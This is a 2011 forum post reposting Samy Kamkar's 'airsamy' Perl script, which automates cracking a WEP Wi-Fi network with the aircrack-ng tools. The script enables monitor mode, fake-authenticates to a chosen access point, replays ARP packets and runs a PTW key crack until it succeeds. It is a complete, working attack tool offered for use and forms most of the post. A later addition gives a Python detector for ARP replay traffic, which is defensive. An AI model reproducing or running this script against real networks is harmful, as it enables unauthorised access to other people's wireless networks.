Author Topic: AirSamy [Script]  (Read 3098 times)

D3M0N
AirSamy [Script]
« on: June 21, 2011, 11:45:01 am »
Quote from: Samy Kamkar
airsamy provides a simple interface to quickly and automatically crack a WEP network in minutes. It displays a list of available WEP networks and once selected, it automatically places your driver in monitor mode, tests packet injection, fake authenticates with the AP, captures IVs for cracking, captures ARP packets and replays them to introduce more IVs into the network, and cracks using the PTW attack.

Code:

use strict;

my $interface = shift || "wlan0";

my $airmon = "airmon-ng";
my $aireplay = "aireplay-ng";
my $aircrack = "aircrack-ng";
my $airodump = "airodump-ng";

# stop + start interface
system($airmon, "start", $interface);

print "Please find an AP to use. When found, hit CTRL+C.\n";
print "[remember part of the name or part of BSSID]\n";

# tmpfile for ap output
my $tmpfile = "/tmp/airsamy" . rand();

# show user APs
eval {
    local $SIG{INT} = sub { die };
    open(DUMP, "$airodump --output-format csv -w $tmpfile $interface|") || die "Can't run airodump ($airodump): $!";
    # block here until the user hits CTRL+C
    while (<DUMP>) { print }
    close(DUMP);
};

# read in APs
my %aps;
my ($tmpfile1) = glob("$tmpfile*");
open(APS, "<$tmpfile1") || die "Can't read tmp file $tmpfile1: $!";
while (<APS>)
{
    # collapse whitespace so the CSV fields split cleanly
    s/\s+/ /g;
    $aps{$_} = 1;
}
close(APS);

# ask for AP
my ($input, $ap);
while (!$ap)
{
    my $found = 0;

    print "\nPlease enter part of the name/bssid of the AP: ";
    chomp($input = <STDIN>);
    $input =~ s/://g;
    print "\n";

    foreach my $tmpap (keys %aps)
    {
        my @data = split(/\s*,\s+/, $tmpap);
        if ($tmpap =~ /$input/i)
        {
            # count matches so an ambiguous answer can be rejected below
            $found++;
            print "Found: $data[0] ($data[13]) ch=$data[3] mb=$data[4] enc=$data[5] $data[6] $data[7]";
            if ($data[5] !~ /WEP/)
            {
                print " -- NOT WEP!";
            }
            $ap = $tmpap;
            print "\n";
        }
    }

    if ($found > 1)
    {
        $ap = undef;
        print "\nPlease be more specific.\n\n";
    }
}

# get ap info
my @data = split(/\s*,\s+/, $ap);
my ($bssid, $essid, $chan) = ($data[0], $data[13], $data[3]);

# start on channel
system($airmon, "start", $interface, $chan);

# test injection
system($aireplay, "-9", "-e", $essid, "-a", $bssid, $interface);

# fake auth with the AP
system($aireplay, "-1", "0", "-e", $essid, "-a", $bssid, $interface);

# fork off, capture IVs in front
if (fork())
{
    # capture IVs
    system($airodump, "-c", $chan, "--bssid", $bssid, "-w", $tmpfile, $interface);

    # crack!
    #system($aircrack, "-z", glob("$tmpfile*cap"));

    # remove extra files
    unlink(glob("$tmpfile*"));
}
# do background stuff to produce packets
else
{
    # crack until we find something
    if (fork())
    {
        my ($key);
        while (!$key)
        {
            open(CRACK, "$aircrack -z " . join(" ", glob("$tmpfile*cap")) . "|");
            while (<CRACK>)
            {
                if (/correctly:\s*100%/)
                {
                    $key = 1;
                }
            }
            close(CRACK);
        }

        system("killall", "-9", $aireplay, $airodump);
        system($aircrack, "-z", glob("$tmpfile*cap"));
    }
    # inject arps
    else
    {
        # capture an ARP and replay
        system($aireplay, "-3", "-b", $bssid, $interface);
    }
}

SITE: http://samy.pl/airsamy.pl
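
A detection-side counterpart to the ARP replay step (`aireplay-ng -3`) in the script above, added here as an example and not part of the original post or of airsamy: replay re-sends one captured frame unchanged, so a monitor sees a single transmitter repeat the same WEP IV toward the broadcast address at a high rate. The frame tuple layout, the function name and the thresholds are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample frames: (time_ms, transmitter MAC, destination MAC, WEP IV hex).
# Station ...:aa is ordinary traffic with a fresh IV per frame.
# Station ...:bb re-sends one captured frame every 2 ms (replay pattern).
SAMPLE_FRAMES = (
    [(100 * i, "02:00:00:00:00:aa",
      BROADCAST if i % 5 == 0 else "02:00:00:00:00:01",
      f"{0x1000 + i:06x}") for i in range(40)]
    + [(1000 + 2 * i, "02:00:00:00:00:bb", BROADCAST, "a1b2c3")
       for i in range(600)]
)

def find_replay_sources(frames, window_ms=1000, min_repeats=100):
    """Return {transmitter: (iv, peak_count)} for transmitters that sent the
    same IV to broadcast at least min_repeats times within window_ms."""
    stamps_by_key = defaultdict(list)      # (src, iv) -> ascending timestamps
    for ts, src, dst, iv in sorted(frames):
        if dst == BROADCAST:
            stamps_by_key[(src, iv)].append(ts)

    flagged = {}
    for (src, iv), stamps in stamps_by_key.items():
        start = 0
        peak = 0
        # Sliding window: largest number of identical-IV frames in window_ms.
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_ms:
                start += 1
            peak = max(peak, end - start + 1)
        # Keep the worst offender IV per transmitter.
        if peak >= min_repeats and peak > flagged.get(src, ("", 0))[1]:
            flagged[src] = (iv, peak)
    return flagged

if __name__ == "__main__":
    for src, (iv, peak) in find_replay_sources(SAMPLE_FRAMES).items():
        print(f"possible ARP replay: {src} repeated IV {iv} {peak}x in 1 s")
```

Legitimate WEP stations change the IV on every frame, so a sustained run of one IV from one transmitter is a strong signal even when the payload cannot be decrypted.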